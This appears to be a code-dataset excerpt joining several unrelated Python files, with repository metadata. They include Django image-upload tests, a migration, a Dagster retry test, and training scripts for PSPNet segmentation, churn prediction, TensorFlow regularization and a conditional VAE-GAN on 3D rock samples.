self.product.images.all().delete()
def test_upload_multiple_images(self):
assert self.client.login(username="staffuser", password="testpass123")
images_count = self.product.images.count()
response = self.client.post(
self.url,
data={
"upload_images": "upload_images",
"image": self.images,
"product_pk": self.product.pk,
},
follow=True,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.product.images.count(), images_count + 5)
def test_upload_non_image(self):
assert self.client.login(username="staffuser", password="testpass123")
txt_file = SimpleUploadedFile(
"file.txt", b"some text", content_type="text/plain"
)
images_count = self.product.images.count()
response = self.client.post(
self.url,
data={
"upload_images": "upload_images",
"image": txt_file,
"product_pk": self.product.pk,
},
follow=True,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.product.images.count(), images_count)
def test_delete_image(self):
assert self.client.login(username="staffuser", password="testpass123")
images_count = self.product.images.count()
response = self.client.post(
self.url,
data={
"image_pk": self.product.images.last().pk,
"delete": "delete",
"product_pk": self.product.pk,
},
follow=True,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.product.images.count(), images_count - 1)
def test_change_images_order(self):
assert self.client.login(username="staffuser", password="testpass123")
image = self.product.images.last()
images_count = self.product.images.count()
self.assertEqual(image.place, images_count - 1)
response = self.client.post(
self.url,
data={"image_pk": image.pk, "move_up": "move_up"},
follow=True,
)
image.refresh_from_db()
self.assertEqual(response.status_code, 200)
self.assertEqual(image.place, images_count - 2)
response = self.client.post(
self.url,
data={"image_pk": image.pk, "move_down": "move_down"},
follow=True,
)
image.refresh_from_db()
self.assertEqual(response.status_code, 200)
self.assertEqual(image.place, images_count - 1)
# border values
# border value down
for i in range(2):
response = self.client.post(
self.url,
data={"image_pk": image.pk, "move_down": "move_down"},
follow=True,
)
image.refresh_from_db()
self.assertEqual(response.status_code, 200)
self.assertEqual(image.place, images_count - 1)
# border value up
for i in range(images_count + 2):
response = self.client.post(
self.url,
data={"image_pk": image.pk, "move_up": "move_up"},
follow=True,
)
image.refresh_from_db()
self.assertEqual(response.status_code, 200)
self.assertEqual(image.place, 0)
# places don't repeat
self.assertEqual(
len(set(self.product.images.values_list("place", flat=True))), images_count
)
| Trojnar/django-store | images/tests.py | tests.py | py | 6,945 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.test.TestCase",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "products.models.get_product_model",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.get_user_model",
"line_number": 22,
"usage_type": "call"
},
... |
16156353318 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('researcher_UI', '0019_auto_20170505_0444'),
]
operations = [
migrations.AddField(
model_name='study',
name='test_period',
field=models.IntegerField(default=14, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(14)]),
),
]
| langcog/web-cdi | webcdi/researcher_UI/migrations/0020_study_test_period.py | 0020_study_test_period.py | py | 544 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.AddField",
"line_number": 15,
"usage_type": "call"
},
{
... |
24623749772 | from utils.dataloader import make_datapath_list, VOCDataset, DataTransform
from torch.utils import data
from utils.pspnet import *
from torch import optim
import math
from utils import train
rootpath = "./data/VOCdevkit/VOC2012/"
train_img_list, train_anno_list, val_img_list, val_anno_list = make_datapath_list(rootpath)
color_mean = (0.485, 0.456, 0.406)
color_std = (0.229, 0.224, 0.225)
train_dataset = VOCDataset(train_img_list, train_anno_list, phase='train',
transform=DataTransform(input_size=475, color_mean=color_mean, color_std=color_std))
val_dataset = VOCDataset(val_img_list, val_anno_list, phase='val',
transform=DataTransform(input_size=475, color_mean=color_mean, color_std=color_std))
batch_size = 8
train_dataloader = data.DataLoader(val_dataset, batch_size=batch_size, shuffle=True)
val_dataloader = data.DataLoader(val_dataset, batch_size=batch_size, shuffle=False)
dataloaders_dict = {'train': train_dataloader, 'val': val_dataloader}
net = PSPNet(n_classes=150)
# 学習済みパラメータをロード
state_dict = torch.load("./weights/pspnet50_ADE20K.pth")
net.load_state_dict(state_dict)
# 分類用の畳み込み層を出力数21の層に付け替える
n_classes = 21
net.decode_feature.classification = nn.Conv2d(in_channels=512, out_channels=n_classes, kernel_size=1, stride=1, padding=0)
net.aux.classification = nn.Conv2d(in_channels=256, out_channels=n_classes, kernel_size=1, stride=1, padding=0)
def weights_init(m):
if isinstance(m, nn.Conv2d):
nn.init.xavier_normal_(m.weight.data)
if m.bias is not None:
nn.init.constant_(m.bias, 0.0)
net.decode_feature.classification.apply(weights_init)
net.aux.classification.apply(weights_init)
print("ネットワーク設定完了:学習済みパラメータをロードしました。")
# 学習率設定
optimizer = optim.SGD([
{'params': net.feature_conv.parameters(), 'lr': 1e-3},
{'params': net.feature_res_1.parameters(), 'lr': 1e-3},
{'params': net.feature_res_2.parameters(), 'lr': 1e-3},
{'params': net.feature_dilated_res_1.parameters(), 'lr': 1e-3},
{'params': net.feature_dilated_res_2.parameters(), 'lr': 1e-3},
{'params': net.pyramid_pooling.parameters(), 'lr': 1e-3},
{'params': net.decode_feature.parameters(), 'lr': 1e-2},
{'params': net.aux.parameters(), 'lr': 1e-2},
], momentum=0.9, weight_decay=0.0001)
def lambda_epoch(epoch):
max_epoch = 30
return math.pow((1-epoch/max_epoch), 0.9)
criterion = PSPLoss(aux_weight=0.4)
scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_epoch)
num_epochs = 30
train.train_model(net, dataloaders_dict, criterion, scheduler, optimizer, num_epochs) | TOnodera/pytorch-advanced | ch03/main.py | main.py | py | 2,748 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "utils.dataloader.make_datapath_list",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "utils.dataloader.VOCDataset",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "utils.dataloader.DataTransform",
"line_number": 15,
"usage_type": "call"
... |
495598497 | # pylint: disable=no-value-for-parameter
from dagster import Output, OutputDefinition, RunConfig, execute_pipeline, pipeline, solid
from dagster.core.instance import DagsterInstance
def test_retries():
fail = {'count': 0}
@solid
def fail_first_times(_, _start_fail):
if fail['count'] < 1:
fail['count'] += 1
raise Exception('blah')
return 'okay perfect'
@solid(
output_defs=[
OutputDefinition(bool, 'start_fail', is_optional=True),
OutputDefinition(bool, 'start_skip', is_optional=True),
]
)
def two_outputs(_):
yield Output(True, 'start_fail')
# won't yield start_skip
@solid
def will_be_skipped(_, _start_skip):
pass # doesn't matter
@solid
def downstream_of_failed(_, input_str):
return input_str
@pipeline
def pipe():
start_fail, start_skip = two_outputs()
downstream_of_failed(fail_first_times(start_fail))
will_be_skipped(start_skip)
env = {'storage': {'filesystem': {}}}
instance = DagsterInstance.ephemeral()
result = execute_pipeline(pipe, environment_dict=env, instance=instance, raise_on_error=False)
second_result = execute_pipeline(
pipe,
environment_dict=env,
run_config=RunConfig(previous_run_id=result.run_id),
instance=instance,
)
assert second_result.success
downstream_of_failed = second_result.result_for_solid('downstream_of_failed').output_value()
assert downstream_of_failed == 'okay perfect'
will_be_skipped = [
e for e in second_result.event_list if str(e.solid_handle) == 'will_be_skipped'
][0]
assert str(will_be_skipped.event_type_value) == 'STEP_SKIPPED'
| helloworld/continuous-dagster | deploy/dagster_modules/dagster/dagster_tests/core_tests/execution_tests/test_retries.py | test_retries.py | py | 1,768 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "dagster.solid",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "dagster.Output",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "dagster.solid",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "dagster.OutputDefinition",... |
71266832745 | import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import sklearn.model_selection as ms
import sklearn.preprocessing as pp
import sklearn.linear_model as lm
import sklearn.ensemble as en
import sklearn.metrics as met
import joblib as jb
df = pd.read_csv('churnprediction_ch9.csv', sep=',', index_col=['customer_id'])
aktif = df.groupby('churn').count()
plt.pie(aktif['product'],labels=['Aktif','Churn'], autopct='%1.0f%%')
plt.axis('equal')
plt.show()
df['product'].value_counts()
data = pd.concat([df, pd.get_dummies(df['product'])], axis=1, sort=False)
data.drop(['product'], axis=1, inplace=True)
dfk = data.corr()
sns.heatmap(dfk, xticklabels=dfk.columns.values, yticklabels=dfk.columns.values, annot=True, annot_kws={'size':12})
heat_map = plt.gcf()
heat_map.set_size_inches(10,10)
plt.xticks(fontsize=15)
plt.yticks(fontsize=15)
plt.show()
data.head(3)
X = data.drop(['reload_2','socmed_2','games','churn'], axis=1, inplace=False)
y = data['churn']
X_train, X_test, y_train, y_test = ms.train_test_split(X, y, test_size=0.2, random_state=0)
scl = pp.StandardScaler(copy=True, with_mean=True, with_std=True)
scl.fit(X_train)
X_train = scl.transform(X_train)
X_test = scl.transform(X_test)
# ALGORITMA LOGISTIC REGRESSION
model = lm.LogisticRegression(solver='lbfgs')
model.fit(X_train, y_train)
print(' ')
print('ALGORITMA LOGISTIC REGRESSION')
y_pred = model.predict(X_test)
print('y_pred : ', y_pred)
score = met.accuracy_score(y_test, y_pred)
print('score : ', score)
presisi = met.precision_score(y_test, y_pred)
print('presisi : ', presisi)
recall = met.recall_score(y_test, y_pred)
print('recall : ', recall)
auc = met.roc_auc_score(y_test, y_pred)
print('auc : ', auc)
print(' ')
jb.dump(model, "modelLogistic.sav")
# ALGORITMA RANDOM FOREST
model = en.RandomForestClassifier(n_estimators=200, random_state=0)
model.fit(X_train, y_train)
print('ALGORITMA RANDOM FOREST')
y_pred = model.predict(X_test)
print('y_pred : ', y_pred)
score = met.accuracy_score(y_test, y_pred)
print('score : ', score)
presisi = met.precision_score(y_test, y_pred)
print('presisi : ', presisi)
recall = met.recall_score(y_test, y_pred)
print('recall : ', recall)
auc = met.roc_auc_score(y_test, y_pred)
print('auc : ', auc)
jb.dump(model, "modelRF.sav")
fitur_penting = pd.Series(model.feature_importances_, index=X.columns)
fitur_penting.nlargest(10).plot(kind='barh')
plt.show()
| arfian-rp/machine-learning-python | Churn Prediction/main.py | main.py | py | 2,414 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.pie",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "matplotlib.py... |
12445078745 | import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import os
# Defining the seed for some random operations:
random_seed = 42
# Setting some variables to format the logs:
log_begin_red, log_begin_blue, log_begin_green = '\033[91m', '\033[94m', '\033[92m'
log_begin_bold, log_begin_underline = '\033[1m', '\033[4m'
log_end_format = '\033[0m'
num_classes = 10
img_rows, img_cols, img_ch = 28, 28, 1
input_shape = (img_rows, img_cols, img_ch)
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train = x_train.reshape(x_train.shape[0], *input_shape)
x_test = x_test.reshape(x_test.shape[0], *input_shape)
# to highlight the advantages of regularization,
# we will make the recognition task harder
# by artificially reducing the number of samples available for training
x_train, y_train = x_train[:200], y_train[:200] # ... 200 training samples instead of 60,000...
print('Training data: {}'.format(x_train.shape))
print('Testing data: {}'.format(x_test.shape))
# 목표는 Training a Model with Regularization
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import (Input, Activation, Dense, Flatten, Conv2D, MaxPooling2D, Dropout,
BatchNormalization)
epochs = 200
batch_size = 32
@tf.function
def conv_layer(x, kernels, bias, s):
z = tf.nn.conv2d(x, kernels, strides=[1, s, s, 1], padding='VALID')
# Finally, applying the bias and activation function (e.g. ReLU):
return tf.nn.relu(z + bias)
class SimpleConvolutionLayer(tf.keras.layers.Layer):
def __init__(self, num_kernels=32, kernel_size=(3, 3), stride=1):
""" Initialize the layer.
:param num_kernels: Number of kernels for the convolution
:param kernel_size: Kernel size (H x W)
:param stride: Vertical/horizontal stride
"""
super().__init__()
self.num_kernels = num_kernels
self.kernel_size = kernel_size
self.stride = stride
def build(self, input_shape):
""" Build the layer, initializing its parameters.
This will be internally called the 1st time the layer is used.
:param input_shape: Input shape for the layer (e.g. BxHxWxC)
"""
num_input_ch = input_shape[-1] # assuming shape format BHWC
# Now we know the shape of the kernel tensor we need:
kernels_shape = (*self.kernel_size, num_input_ch, self.num_kernels)
# We initialize the filter values e.g. from a Glorot distribution:
glorot_init = tf.initializers.GlorotUniform()
self.kernels = self.add_weight( # method to add Variables to layer
name='kernels', shape=kernels_shape, initializer=glorot_init,
trainable=True) # and we make it trainable.
# Same for the bias variable (e.g. from a normal distribution):
self.bias = self.add_weight(
name='bias', shape=(self.num_kernels,),
initializer='random_normal', trainable=True)
def call(self, inputs):
""" Call the layer, apply its operations to the input tensor."""
return conv_layer(inputs, self.kernels, self.bias, self.stride)
def get_config(self):
"""
Helper function to define the layer and its parameters.
:return: Dictionary containing the layer's configuration
"""
return {'num_kernels': self.num_kernels,
'kernel_size': self.kernel_size,
'strides': self.strides,
'use_bias': self.use_bias}
# We will extend 위에 있는 layer class
# to add kernel/bias regularization.
# the Layer's method .add_loss() can be used for that purpose
from functools import partial
def l2_reg(coef=1e-2):
return lambda x: tf.reduce_sum(x ** 2) * coef
# Inherit from the layer above and attach a regularization term to every parameter.
class ConvWithRegularizers(SimpleConvolutionLayer):
    """Convolution layer that registers kernel/bias regularization losses."""
    def __init__(self, num_kernels=32, kernel_size=(3, 3), stride=1,
                 kernel_regularizer=l2_reg(), bias_regularizer=None):
        super().__init__(num_kernels, kernel_size, stride)
        self.kernel_regularizer = kernel_regularizer
        self.bias_regularizer = bias_regularizer
    def build(self, input_shape):
        super().build(input_shape)
        # Simpler alternatives to the explicit add_loss() calls below:
        # 1. Pass the regularizer straight to the weight inside build():
        #    self.add_weight(..., regularizer=self.kernel_regularizer)
        # 2. Use the regularizers predefined in Keras:
        #    l1 = tf.keras.regularizers.l1(0.01)
        #    Conv2D(..., kernel_regularizer=l1)
        #    With those, Keras automatically adds the regularization loss in fit().
        if self.kernel_regularizer is not None:
            self.add_loss(partial(self.kernel_regularizer, self.kernels))
        if self.bias_regularizer is not None:
            self.add_loss(partial(self.bias_regularizer, self.bias))
# Instantiate a regularized conv layer and build it so its weights exist.
conv = ConvWithRegularizers(
    num_kernels=32, kernel_size=(3, 3), stride=1,
    kernel_regularizer=l2_reg(1.), bias_regularizer=l2_reg(1.))
conv.build(input_shape=tf.TensorShape((None, 28, 28, 1)))
# Every term registered through add_loss() is gathered in `.losses`
# (one entry per regularized parameter of the layer).
reg_losses = conv.losses
print('Regularization losses over kernel and bias parameters: {}'.format(
    [loss.numpy() for loss in reg_losses]))
# Comparing with the L2 norms of its kernel and bias tensors:
kernel_norm = tf.reduce_sum(conv.kernels ** 2).numpy()
bias_norm = tf.reduce_sum(conv.bias ** 2).numpy()
print('L2 norms of kernel and bias parameters: {}'.format([kernel_norm, bias_norm]))
# A model stacking such layers exposes the losses of all its layers at once:
model = Sequential([
    Input(shape=input_shape),
    ConvWithRegularizers(kernel_regularizer=l2_reg(1.), bias_regularizer=l2_reg(1.)),
    ConvWithRegularizers(kernel_regularizer=l2_reg(1.), bias_regularizer=l2_reg(1.)),
    ConvWithRegularizers(kernel_regularizer=l2_reg(1.), bias_regularizer=l2_reg(1.)),
])
print('Losses attached to the model and its layers:\n\r{} ({} losses)'.format(
    [loss.numpy() for loss in model.losses], len(model.losses)))
# Now build a LeNet from these regularized convolution layers and test it.
class LeNet5(Model):
    """LeNet-5 assembled from `ConvWithRegularizers` blocks.

    :param num_classes: Width of the final softmax layer.
    :param kernel_regularizer: Regularizer shared by both conv kernels.
    :param bias_regularizer: Regularizer shared by both conv biases.
    """
    def __init__(self, num_classes, kernel_regularizer=l2_reg(), bias_regularizer=l2_reg()):
        super(LeNet5, self).__init__()
        self.conv1 = ConvWithRegularizers(
            6, kernel_size=(5, 5),
            kernel_regularizer=kernel_regularizer, bias_regularizer=bias_regularizer)
        self.conv2 = ConvWithRegularizers(
            16, kernel_size=(5, 5),
            kernel_regularizer=kernel_regularizer, bias_regularizer=bias_regularizer)
        self.max_pool = MaxPooling2D(pool_size=(2, 2))
        self.flatten = Flatten()
        self.dense1 = Dense(120, activation='relu')
        self.dense2 = Dense(84, activation='relu')
        self.dense3 = Dense(num_classes, activation='softmax')
    def call(self, x):
        """Forward pass: two conv+pool stages, then the dense classifier head."""
        features = self.max_pool(self.conv1(x))
        features = self.max_pool(self.conv2(features))
        flat = self.flatten(features)
        hidden = self.dense2(self.dense1(flat))
        return self.dense3(hidden)
optimizer = tf.optimizers.SGD()
dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train)).batch(batch_size)
# Template for the per-epoch log line; {5}/{6} are ANSI color begin/end markers.
log_string_template = 'Epoch {0:3}/{1}: main loss = {5}{2:5.3f}{6}; ' + \
                      'reg loss = {5}{3:5.3f}{6}; val acc = {5}{4:5.3f}%{6}'
def train_classifier_on_mnist(model, log_frequency=10):
    """Train `model` on the module-level MNIST data, adding the model's
    regularization losses to the cross-entropy, and log metrics every
    `log_frequency` epochs. Returns the trained model.

    Relies on the notebook-scope globals `optimizer`, `dataset`, `epochs`,
    `x_test`/`y_test` and the `log_begin_*`/`log_end_format` color codes.
    """
    avg_main_loss = tf.keras.metrics.Mean(name='avg_main_loss', dtype=tf.float32)
    avg_reg_loss = tf.keras.metrics.Mean(name='avg_reg_loss', dtype=tf.float32)
    print("Training: {}start{}".format(log_begin_red, log_end_format))
    for epoch in range(epochs):
        for (batch_images, batch_gts) in dataset: # For each batch of this epoch
            with tf.GradientTape() as grad_tape:
                y = model(batch_images)
                main_loss = tf.losses.sparse_categorical_crossentropy(batch_gts, y)
                reg_loss = sum(model.losses) # add every layer's regularization loss!
                loss = main_loss + reg_loss
            grads = grad_tape.gradient(loss, model.trainable_variables)
            optimizer.apply_gradients(zip(grads, model.trainable_variables))
            avg_main_loss.update_state(main_loss)
            avg_reg_loss.update_state(reg_loss)
        if epoch % log_frequency == 0 or epoch == (epochs - 1): # Log some metrics
            # Validate, computing the accuracy on test data:
            acc = tf.reduce_mean(tf.metrics.sparse_categorical_accuracy(
                tf.constant(y_test), model(x_test))).numpy() * 100
            main_loss = avg_main_loss.result()
            reg_loss = avg_reg_loss.result()
            print(log_string_template.format(
                epoch, epochs, main_loss, reg_loss, acc, log_begin_blue, log_end_format))
            avg_main_loss.reset_states()
            avg_reg_loss.reset_states()
    print("Training: {}end{}".format(log_begin_green, log_end_format))
    return model
# Compare training with and without weight regularization.
model = LeNet5(10, kernel_regularizer=l2_reg(), bias_regularizer=l2_reg())
model = train_classifier_on_mnist(model, log_frequency=10)
# Baseline without any regularization:
model = LeNet5(10, kernel_regularizer=None, bias_regularizer=None)
model = train_classifier_on_mnist(model, log_frequency=50)
# Now let's use the regularization utilities that ship with Keras.
def lenet(name='lenet', input_shape=input_shape,
          use_dropout=False, use_batchnorm=False, regularizer=None):
    """Assemble a LeNet-5-style Sequential model with optional regularization.

    :param name: Name given to the Keras model.
    :param input_shape: Input image shape (defaults to the notebook-scope value).
    :param use_dropout: If True, insert Dropout(0.25) after each block.
    :param use_batchnorm: If True, insert BatchNormalization before each ReLU.
    :param regularizer: Optional kernel regularizer for conv/dense layers.
    :return: The assembled `Sequential` model.
    """
    layers = []
    # Convolutional block 1:
    layers.append(Conv2D(6, kernel_size=(5, 5), padding='same',
                         input_shape=input_shape, kernel_regularizer=regularizer))
    if use_batchnorm:
        layers.append(BatchNormalization())
    layers.append(Activation('relu'))
    layers.append(MaxPooling2D(pool_size=(2, 2)))
    if use_dropout:
        layers.append(Dropout(0.25))
    # Convolutional block 2:
    layers.append(Conv2D(16, kernel_size=(5, 5), kernel_regularizer=regularizer))
    if use_batchnorm:
        layers.append(BatchNormalization())
    layers.append(Activation('relu'))
    layers.append(MaxPooling2D(pool_size=(2, 2)))
    if use_dropout:
        layers.append(Dropout(0.25))
    # Dense classifier head:
    layers.append(Flatten())
    layers.append(Dense(120, kernel_regularizer=regularizer))
    if use_batchnorm:
        layers.append(BatchNormalization())
    layers.append(Activation('relu'))
    if use_dropout:
        layers.append(Dropout(0.25))
    layers.append(Dense(84, kernel_regularizer=regularizer))
    layers.append(Activation('relu'))
    layers.append(Dense(num_classes, activation='softmax'))
    return Sequential(layers, name=name)
# Each configuration toggles dropout / batch-norm and/or a weight regularizer.
# Bug fix: 'l1_dropout' and 'l1_dropout_bn' previously had
# 'use_dropout': False (copied from the 'l1_bn' line), so they did not match
# their names — 'l1_dropout' was a duplicate of 'l1_bn'. Dropout is now
# actually enabled for both, and 'l1_dropout' no longer enables batch-norm.
configurations = {
    'none': {'use_dropout': False, 'use_batchnorm': False, 'regularizer': None},
    'l1': {'use_dropout': False, 'use_batchnorm': False, 'regularizer': tf.keras.regularizers.l1(0.01)},
    'l2': {'use_dropout': False, 'use_batchnorm': False, 'regularizer': tf.keras.regularizers.l2(0.01)},
    'dropout': {'use_dropout': True, 'use_batchnorm': False, 'regularizer': None},
    'bn': {'use_dropout': False, 'use_batchnorm': True, 'regularizer': None},
    'l1_dropout': {'use_dropout': True, 'use_batchnorm': False, 'regularizer': tf.keras.regularizers.l1(0.01)},
    'l1_bn': {'use_dropout': False, 'use_batchnorm': True, 'regularizer': tf.keras.regularizers.l1(0.01)},
    'l1_dropout_bn': {'use_dropout': True, 'use_batchnorm': True, 'regularizer': tf.keras.regularizers.l1(0.01)}
    # ...
}
# Train one model per configuration and keep each training history for plotting.
history_per_instance = dict()
print("Experiment: {0}start{1} (training logs = off)".format(log_begin_red, log_end_format))
for config_name in configurations:
    # Resetting the seeds (for random number generation), to reduce the impact of randomness on the comparison:
    tf.random.set_seed(random_seed)
    np.random.seed(random_seed)
    model = lenet("lenet_{}".format(config_name), **configurations[config_name])
    model.compile(optimizer='sgd', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
    # Launching the training (we set `verbose=0`, so the training won't generate any logs):
    print("\t> Training with {0}: {1}start{2}".format(config_name, log_begin_red, log_end_format))
    history = model.fit(x_train, y_train, batch_size=32, epochs=300, validation_data=(x_test, y_test), verbose=0)
    history_per_instance[config_name] = history
    print('\t> Training with {0}: {1}done{2}.'.format(config_name, log_begin_green, log_end_format))
print("Experiment: {0}done{1}".format(log_begin_green, log_end_format))
# Plot train/val loss and accuracy curves for every configuration side by side.
fig, ax = plt.subplots(2, 2, figsize=(10, 10),
                       sharex='col') # add parameter `sharey='row'` for a more direct comparison
ax[0, 0].set_title("loss")
ax[0, 1].set_title("val-loss")
ax[1, 0].set_title("accuracy")
ax[1, 1].set_title("val-accuracy")
lines, labels = [], []
for config_name in history_per_instance:
    history = history_per_instance[config_name]
    ax[0, 0].plot(history.history['loss'])
    ax[0, 1].plot(history.history['val_loss'])
    ax[1, 0].plot(history.history['accuracy'])
    line = ax[1, 1].plot(history.history['val_accuracy'])
    lines.append(line[0])
    labels.append(config_name)
# One shared legend for all four panels:
fig.legend(lines, labels, loc='center right', borderaxespad=0.1)
plt.subplots_adjust(right=0.84)
# Report the best validation accuracy reached by each configuration:
for config_name in history_per_instance:
    best_val_acc = max(history_per_instance[config_name].history['val_accuracy']) * 100
    print('Max val-accuracy for model "{}": {:2.2f}%'.format(config_name, best_val_acc))
| happiness6533/AI-study-project | supervised_learning/neural_network/regularizers.py | regularizers.py | py | 13,898 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.keras.datasets.mnist.load_data",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.nn.conv2d",
"line_number": 40,
"usage_type": "call"
},
{
... |
22557090121 | import torch
import numpy as np
import matplotlib.pyplot as plt
import torch.optim as optim
from tqdm import tqdm
from cvaegan.conditional_architecture import *
from cvaegan.utils import *
import porespy as ps
# Load 1000 binary 128^3 Bentheimer rock samples and their porosity labels.
DATASET = torch.from_numpy(np.load('./data/bentheimer1000.npy')).reshape(1000,1,128,128,128)
POROSITY = torch.from_numpy(np.load('./data/bentheimer_conditional.npy')).float()
print(DATASET.shape)
print(POROSITY.shape)
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
DEVICE = torch.device('cuda')
# Specifying folder locations to save models per epoch
CHECKPOINT_GEN = "./checkpoints/generator/"
CHECKPOINT_CRITIC = "./checkpoints/critic/"
# Training hyperparameters
LEARNING_RATE = 1e-3
BATCH_SIZE = 4
Z_DIM = 16
LATENT = 512
NUM_EPOCHS = 1001
CRITIC_ITERATIONS = 4  # critic updates per batch (WGAN-GP style)
GENERATOR_ITERATIONS = 1  # encoder+generator updates per batch
LAMBDA_GP = 50  # gradient-penalty weight
# initialize data loader
loader = DataLoader(MyLoader(DATASET, POROSITY), batch_size=BATCH_SIZE, shuffle=True, num_workers=0)
seed_everything(seed=3407)
# initialize encoder, generator and critic (all in train mode)
encoder = Encoder(Z_DIM, BATCH_SIZE, LATENT, DEVICE).to(DEVICE)
encoder.train()
gen = Generator(Z_DIM, BATCH_SIZE, LATENT, DEVICE).to(DEVICE)
gen.train()
critic = Discriminator(Z_DIM, BATCH_SIZE, LATENT, DEVICE).to(DEVICE)
critic.train()
# initialize optimizers (one per network) with cosine-annealed learning rates
opt_encoder = optim.Adam(encoder.parameters(), lr=LEARNING_RATE, betas=(0.9, 0.999))
scheduler_encoder = optim.lr_scheduler.CosineAnnealingLR(opt_encoder, 4 * NUM_EPOCHS * GENERATOR_ITERATIONS)
opt_gen = optim.Adam(gen.parameters(), lr=LEARNING_RATE, betas=(0.0, 0.9))
scheduler_gen = optim.lr_scheduler.CosineAnnealingLR(opt_gen, 4 * NUM_EPOCHS * GENERATOR_ITERATIONS)
opt_critic = optim.Adam(critic.parameters(), lr=LEARNING_RATE, betas=(0.0, 0.9))
scheduler_critic = optim.lr_scheduler.CosineAnnealingLR(opt_critic, 4 * NUM_EPOCHS * CRITIC_ITERATIONS)
# fixed noise for display (kept constant so progress images are comparable)
fixed_noise = noise = torch.randn(BATCH_SIZE,LATENT).to(DEVICE)
# Criterion for measuring porosity difference
criterion = torch.nn.L1Loss()
# Per-epoch mean losses, appended inside the training loop below
losses_encoder = []
losses_gen = []
losses_critic = []
# Main training loop: WGAN-GP critic updates, then joint VAE-encoder/generator
# updates conditioned on porosity, with progress plots and checkpoints.
for epoch in range(NUM_EPOCHS):
    batches = tqdm(loader)
    mean_loss_encoder = 0
    mean_loss_gen = 0
    mean_loss_critic = 0
    for batch_idx, real_cond in enumerate(batches):
        real = real_cond[0].float().unsqueeze(1).to(DEVICE)
        cur_batch_size = real.shape[0]
        c1 = real_cond[1].reshape(BATCH_SIZE,1).to(DEVICE)  # NOTE(review): uses BATCH_SIZE, not cur_batch_size — fails if the last batch is short; confirm dataset size is divisible by BATCH_SIZE
        # --- Critic: maximize D(real) - D(fake) with gradient penalty ---
        for _ in range(CRITIC_ITERATIONS):
            noise = torch.randn(cur_batch_size,LATENT).to(DEVICE)
            fake = gen(noise, c1)
            critic_real = critic(real, c1).reshape(-1)
            critic_fake = critic(fake, c1).reshape(-1)
            gp = gradient_penalty(critic, real, fake, c1, device=DEVICE)
            loss_critic = torch.mean(critic_fake) - torch.mean(critic_real) + LAMBDA_GP * gp
            critic.zero_grad()
            loss_critic.backward()
            opt_critic.step()
            scheduler_critic.step()
            # mean critic loss
            mean_loss_critic += loss_critic.item()
        # --- Encoder + generator: VAE reconstruction + porosity match + adversarial term ---
        for _ in range(GENERATOR_ITERATIONS):
            # Update encoder network
            z,mean,logvar = encoder(real,c1)
            recon_data = gen(z,c1)
            # Update G network
            noise = torch.randn(cur_batch_size,LATENT).to(DEVICE)
            noise_label = 0.3*torch.rand(cur_batch_size, 1).to(DEVICE)
            fake = gen(noise, noise_label)
            # Porosity of the reconstruction (fraction of zero voxels after rounding)
            c3 = 1-torch.mean(torch.round(recon_data),dim=[2,3,4])
            gen_fake = critic(fake, noise_label).reshape(-1)
            # VAE ELBO (defined elsewhere) plus heavily-weighted porosity L1 match
            loss_encoder = loss_function(recon_data,real,mean,logvar) + 1000 * criterion(c3,c1)
            loss_gen = - torch.mean(gen_fake)
            encoder.zero_grad()
            gen.zero_grad()
            loss_encoder.backward(retain_graph=True)
            loss_gen.backward()
            opt_encoder.step()
            opt_gen.step()
            scheduler_encoder.step()
            scheduler_gen.step()
            # mean vae loss
            mean_loss_encoder += loss_encoder.item()
            # mean generator loss
            mean_loss_gen += loss_gen.item()
        batches.set_postfix(
            epoch=epoch,
            encoder_loss=loss_encoder.item(),
            gen_loss=loss_gen.item(),
            critic_loss=loss_critic.item(),
        )
    # Every 5 epochs, render fixed-noise samples next to a real slice.
    # NOTE(review): figures are never closed (no plt.close), so memory grows over epochs.
    if epoch % 5 == 0:
        fig, ax = plt.subplots(2,3, figsize=(14,8))
        rl = real[0][0].reshape(128,128,128).detach().cpu().numpy()
        fk2 = np.round(gen(fixed_noise, c1)[0][0].reshape(128,128,128).detach().cpu().numpy())
        ax[0][0].imshow(gen(fixed_noise, c1)[0,0,64,:,:].detach().cpu().numpy(), cmap='gray')
        ax[1][0].imshow(rl[64,:,:], cmap='gray')
        porreal = 1-np.mean(rl)
        porfake2 = 1-np.mean(fk2)
        ax[0][1].imshow(np.round(fk2[64,:,:]), cmap='gray')
        ax[1][1].imshow(np.round(rl[64,:,:]), cmap='gray')
        ax[1][1].set_title(f'real={porreal:.4f}')
